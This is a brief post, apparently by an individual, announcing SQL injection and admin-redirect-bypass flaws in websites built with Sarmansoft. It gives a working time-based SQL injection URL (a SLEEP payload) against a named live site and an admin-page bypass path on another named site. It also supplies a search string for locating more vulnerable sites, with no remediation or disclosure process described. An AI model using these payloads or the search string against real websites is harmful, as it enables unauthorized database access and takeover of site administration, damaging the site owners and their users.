I found no-redirect vulnerability and sql vulnerability on some websites prepared with Sarmansoft. In the first example, you can add the "and" "or" parameter and execute your own queries, apart from the database's own query.
SQL İNJ (SLEEP) EXAMPLE: https://passionturkey.com/neler.php?id=9%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))nQIP)
NO-REDİRECT EXAMPLE: https://uyarlar.com.tr/admin/index.php
Replace the address with: /admin/anasayfa_ayarlari.php
To find more websites // "® Software & Technology | Sarman Soft Software and Technology Services"
My Concat Address: e7967149@gmail.com